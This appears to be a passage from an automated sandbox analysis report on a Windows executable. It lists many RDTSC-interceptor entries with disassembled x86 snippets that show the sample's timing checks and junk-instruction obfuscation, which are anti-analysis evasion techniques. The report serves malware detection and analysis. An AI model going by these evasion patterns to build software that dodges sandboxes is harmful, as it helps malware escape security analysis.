Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C3867 second address: 9C3876 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C416B second address: 9C416F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C416F second address: 9C4179 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 986826 second address: 986859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7F9153F87Dh 0x00000008 jo 00007F7F9153F876h 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F7F9153F884h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C4179 second address: 9C417D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 986859 second address: 98685D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 98685D second address: 986867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 986867 second address: 986879 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F87Ch 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CA241 second address: 9CA267 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F7F91348E28h 0x0000000c jmp 00007F7F91348E34h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CA267 second address: 9CA26B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CDB9C second address: 9CDBCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jne 00007F7F91348E26h 0x00000010 jns 00007F7F91348E26h 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CDBCD second address: 9CDBD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C7660 second address: 9C7667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CFA3D second address: 9CFA47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9D0A95 second address: 9D0AA4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7F91348E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9D0AA4 second address: 9D0B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jne 00007F7F9153F88Ch 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F7F9153F878h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 and edi, 0B09FF58h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007F7F9153F878h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a mov ebx, dword ptr [ebp+12448B93h] 0x00000050 push 00000000h 0x00000052 jnl 00007F7F9153F889h 0x00000058 xchg eax, esi 0x00000059 jnc 00007F7F9153F880h 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9D0B4F second address: 9D0B53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9D0B53 second address: 9D0B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9D2B09 second address: 9D2B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9D4B79 second address: 9D4B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9D4B7D second address: 9D4B8E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F7F91348E26h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9D4B8E second address: 9D4B94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9D4B94 second address: 9D4B99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9D4B99 second address: 9D4B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CCD76 second address: 9CCE2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F7F91348E2Eh 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f jnl 00007F7F91348E33h 0x00000015 nop 0x00000016 mov dword ptr [ebp+12448B93h], edi 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov dword ptr [ebp+122D1A9Ch], edi 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F7F91348E28h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000015h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a sub dword ptr [ebp+12444A5Ch], esi 0x00000050 mov eax, dword ptr [ebp+122D0A45h] 0x00000056 push 00000000h 0x00000058 push esi 0x00000059 call 00007F7F91348E28h 0x0000005e pop esi 0x0000005f mov dword ptr [esp+04h], esi 0x00000063 add dword ptr [esp+04h], 0000001Ch 0x0000006b inc esi 0x0000006c push esi 0x0000006d ret 0x0000006e pop esi 0x0000006f ret 0x00000070 mov dword ptr [ebp+122D1BBAh], ebx 0x00000076 jnl 00007F7F91348E2Ch 0x0000007c push FFFFFFFFh 0x0000007e mov bl, ch 0x00000080 push eax 0x00000081 jbe 00007F7F91348E34h 0x00000087 push eax 0x00000088 push edx 0x00000089 jnp 00007F7F91348E26h 0x0000008f rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9D8B2E second address: 9D8B34 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9D8B34 second address: 9D8B50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F91348E38h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9DACBF second address: 9DACC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9DAD73 second address: 9DAD78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CDCF5 second address: 9CDD12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F882h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9DBCF7 second address: 9DBD2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7F91348E2Fh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jng 00007F7F91348E36h 0x00000015 jmp 00007F7F91348E30h 0x0000001a pushad 0x0000001b jp 00007F7F91348E26h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CDD12 second address: 9CDD16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CDD16 second address: 9CDD1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CDD1C second address: 9CDD22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CDD22 second address: 9CDD26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CDD26 second address: 9CDDD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F7F9153F878h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 mov dword ptr [ebp+12473E9Dh], ecx 0x00000029 push dword ptr fs:[00000000h] 0x00000030 mov dword ptr [ebp+12444A62h], esi 0x00000036 sub di, 41DFh 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 mov dword ptr [ebp+12448B93h], edx 0x00000048 mov eax, dword ptr [ebp+122D0571h] 0x0000004e push 00000000h 0x00000050 push ebp 0x00000051 call 00007F7F9153F878h 0x00000056 pop ebp 0x00000057 mov dword ptr [esp+04h], ebp 0x0000005b add dword ptr [esp+04h], 0000001Bh 0x00000063 inc ebp 0x00000064 push ebp 0x00000065 ret 0x00000066 pop ebp 0x00000067 ret 0x00000068 push FFFFFFFFh 0x0000006a sbb ebx, 28C236D4h 0x00000070 nop 0x00000071 jnc 00007F7F9153F891h 0x00000077 push eax 0x00000078 push esi 0x00000079 push eax 0x0000007a push edx 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CDDD2 second address: 9CDDD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9D2C74 second address: 9D2C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9D2C78 second address: 9D2C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9D2C7C second address: 9D2C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9D5D3D second address: 9D5D43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9D7C44 second address: 9D7C48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9D7C48 second address: 9D7C6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7F91348E39h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9D8D22 second address: 9D8D42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F7F9153F878h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9DAF8D second address: 9DAF91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9DBF40 second address: 9DBF44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9DBF44 second address: 9DBF48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9DF68D second address: 9DF695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9E5560 second address: 9E5585 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F7F91348E37h 0x0000000c jnp 00007F7F91348E26h 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9E4F39 second address: 9E4F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jng 00007F7F9153F876h 0x00000010 jmp 00007F7F9153F87Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9E9927 second address: 9E992D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 981938 second address: 98193D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 98193D second address: 98195D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F7F91348E26h 0x0000000a jmp 00007F7F91348E34h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9EFBCB second address: 9EFBDB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7F9153F882h 0x00000008 jl 00007F7F9153F876h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F0277 second address: 9F027B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F027B second address: 9F0281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F03EA second address: 9F03F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F03F1 second address: 9F03F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F06AA second address: 9F06D1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F91348E26h 0x00000008 jmp 00007F7F91348E39h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F06D1 second address: 9F06D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F06D5 second address: 9F06D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F06D9 second address: 9F06E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F06E2 second address: 9F06FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7F91348E26h 0x0000000a pop edx 0x0000000b js 00007F7F91348E32h 0x00000011 jnc 00007F7F91348E26h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F080C second address: 9F0820 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007F7F9153F876h 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F7F9153F876h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F0820 second address: 9F083A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7F91348E30h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F41C9 second address: 9F41E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F9153F888h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F41E5 second address: 9F41E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F41E9 second address: 9F4206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7F9153F885h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F4206 second address: 9F4210 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F91348E26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F4210 second address: 9F422A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7F9153F87Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F422A second address: 9F422E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9F422E second address: 9F4232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CACF9 second address: 9AA9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jmp 00007F7F91348E30h 0x0000000d jp 00007F7F91348E26h 0x00000013 popad 0x00000014 pop edx 0x00000015 nop 0x00000016 movzx edi, cx 0x00000019 call dword ptr [ebp+122D5436h] 0x0000001f pushad 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CB270 second address: 9CB274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CB3C6 second address: 9CB3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7F91348E37h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CB3E6 second address: 9CB3FB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7F9153F878h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CB3FB second address: 9CB406 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CB4DA second address: 9CB4DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CB4DE second address: 9CB4E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CB4E4 second address: 9CB4EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CB518 second address: 9CB53D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CB53D second address: 9CB54D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F87Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9CB833 second address: 9CB887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F7F91348E28h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov edi, dword ptr [ebp+122D270Bh] 0x00000028 push 00000004h 0x0000002a jmp 00007F7F91348E32h 0x0000002f cld 0x00000030 push eax 0x00000031 jl 00007F7F91348E32h 0x00000037 jo 00007F7F91348E2Ch 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
